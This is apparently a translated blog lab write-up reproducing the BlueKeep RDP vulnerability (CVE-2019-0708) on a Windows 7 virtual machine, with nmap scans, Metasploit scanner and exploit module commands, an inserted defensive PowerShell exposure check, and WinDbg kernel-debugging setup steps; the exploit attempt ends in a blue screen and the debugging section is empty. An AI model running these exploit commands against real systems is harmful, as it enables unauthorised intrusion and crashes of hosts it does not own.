Domain Exploitation 03 - Vulnerability (CVE-2019-0708)

Vulnerability profile:

        CVE-2019-0708 affects only the following system versions; systems newer than Windows 7 are not vulnerable:

        Windows Server 2008 R2, Windows Server 2008, Windows 2003, Windows XP.

        The vulnerability is attacked over the RDP protocol, so the host being attacked must have Remote Desktop enabled, normally on port 3389. It is a use-after-free (UAF) heap vulnerability in termdd.sys. Because the vulnerable code runs in the kernel, choosing the wrong target configuration during an attack easily causes a blue screen, so it must be handled with caution in a real engagement.

Vulnerability reproduction:

Target machine environment:

        win7: 192.168.1.10

        VMware: 17

        kali: 192.168.1.5

First, from Kali, use nmap to scan the Windows 7 target. Scan for open ports first; if the service on a port is not identified, run a version scan on that port based on the result, which identifies the protocol behind the port more reliably, and add -O to identify the operating system:

nmap -p- --min-rate 2000 -sT 192.168.1.10
nmap -p 3389 --version-all -O 192.168.1.10

You can see port 3389 running RDP (ms-wbt-server), so it can be tested. Because the target runs in a virtual machine, nmap's OS identification is not very accurate.

Testing whether the vulnerability exists:

        Once the target is found and port 3389 is open to the outside, first test whether the vulnerability exists, and only then decide whether to carry out the next step of the attack:

msfconsole
reload_all
search 0708

Two modules are listed: the first is the PoC (scanner) and the second is the exploit.

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.1.10
show options

The scanner shows that the target is vulnerable.
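The scanner above confirms exposure from the attacker's side. As an added example that is not part of the original post, the PowerShell function below is the host-side counterpart a defender would run on the Windows machine itself: it checks whether the host is in the version range the post lists (plus the Windows 7 target the post uses), whether Remote Desktop is enabled and actually listening, and whether Network Level Authentication is required, which rejects unauthenticated clients before the vulnerable code path. The registry keys and netstat usage are standard Windows ones; the version-number mapping is an assumption noted in the comments.

```powershell
# Added example (not from the original post). Run as administrator on the
# Windows host being assessed. Assumption: affected versions are XP/2003 (5.x),
# Vista/2008 (6.0) and Windows 7/2008 R2 (6.1); anything newer is out of scope.

function Get-BlueKeepExposure {
    $os = [Environment]::OSVersion.Version
    $affectedVersion = ($os.Major -eq 5) -or ($os.Major -eq 6 -and $os.Minor -le 1)

    $tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpKey = "$tsKey\WinStations\RDP-Tcp"
    $ts  = Get-ItemProperty -Path $tsKey
    $rdp = Get-ItemProperty -Path $rdpKey

    # fDenyTSConnections = 1 means Remote Desktop is switched off.
    $rdpEnabled = ($ts.fDenyTSConnections -eq 0)
    # UserAuthentication = 1 means Network Level Authentication is required,
    # so an unauthenticated client is rejected before the vulnerable code runs.
    $nlaRequired = ($rdp.UserAuthentication -eq 1)
    # RDP listens on 3389 unless PortNumber was changed.
    $port = if ($rdp.PortNumber) { $rdp.PortNumber } else { 3389 }
    # Confirm something is really listening on that port right now.
    $listening = [bool](netstat -ano |
        Select-String -Pattern "^\s*TCP\s+\S+:$port\s+\S+\s+LISTENING")

    if (-not $affectedVersion) {
        $verdict = 'Not in the affected version range'
    } elseif (-not ($rdpEnabled -and $listening)) {
        $verdict = 'Affected version, but RDP is not reachable'
    } elseif ($nlaRequired) {
        $verdict = 'Affected version, RDP reachable, NLA required (mitigated; still patch)'
    } else {
        $verdict = 'EXPOSED: unauthenticated RDP on an affected version, patch now'
    }

    # New-Object rather than [PSCustomObject] so this also runs on PowerShell 2.0 (Windows 7).
    New-Object PSObject -Property @{
        OSVersion   = $os.ToString()
        RdpEnabled  = $rdpEnabled
        Port        = $port
        Listening   = $listening
        NlaRequired = $nlaRequired
        Verdict     = $verdict
    }
}

Get-BlueKeepExposure | Format-List
```

The Verdict line is what to act on: an affected version with RDP listening and no NLA is the exact configuration the scanner above flags.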

Exploitation:

        Next, try the attack with the exploit module found in msf:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.10
set target 1
set forceexploit true
show options

        Use show targets to view the list of target platforms. When an attack ends in a blue screen, check here for the entry that matches the system you are attacking.

        The current configuration can be viewed with show options.

        Run the exploit:

        After running it, I got a blue screen and no shell was returned, which is quite awkward. This must be a problem with the address the exploit uses. Debug it to see:


Summary:

        Because this vulnerability attacks the kernel, the addresses differ between system versions, so exploitation easily causes a blue screen. That is still very dangerous in a real penetration test; after all, the impact of a blue screen is fairly large. So this is better treated as research. If you really want to attempt the attack, it is best to try it against exactly the matching system version.

Aside: debugging test:

Install WinDbg:

First install WinDbg; download addresses:

x64
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
x86
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi

Install and set up two-machine kernel debugging:

  1. Select [Edit Virtual Machine Settings] and remove [Printers].
  2. Add a [Serial Port]; in its configuration select [Use Named Pipe], enter \\.\pipe\com_1, set the first option to [This end is the server] and the second to [The other end is an application]. Check [Yield CPU on poll] and click [OK].
  3. Start Windows 7, open a command prompt as administrator, and run bcdedit /dbgsettings serial baudrate:115200 debugport:1 to set the debug port to COM1 and the baud rate to 115200.
  4. Run bcdedit /displayorder {current} {e8a0ccf0-9748-11eb-950a-ce6045b926ac} to add the new entry to the boot menu. (Note: replace {e8a0ccf0-9748-11eb-950a-ce6045b926ac} with the ID printed when you created the DebugEntry boot entry, i.e. the output of bcdedit /copy {current} /d "DebugEntry".)
  5. Run bcdedit /debug {e8a0ccf0-9748-11eb-950a-ce6045b926ac} ON to enable debugging (same ID as above).
  6. Send WinDbg to the desktop as a shortcut, right-click the shortcut, choose [Properties], and append -b -k com:pipe,port=\\.\pipe\com_1,resets=0 to the Target field (note: if the existing target is wrapped in double quotation marks, the appended text goes after the closing quotation mark).
  7. Set a system environment variable named _NT_SYMBOL_PATH with the value srv*d:\ctftools\symbols*http://msdl.microsoft.com/download/symbols, where d:\ctftools\symbols is the local symbol cache directory and can be changed as you like.
  8. Restart Windows 7, select [DebugEntry] in the boot menu, and open WinDbg at the same time.

Debugging:



Origin blog.csdn.net/GalaxySpaceX/article/details/130449689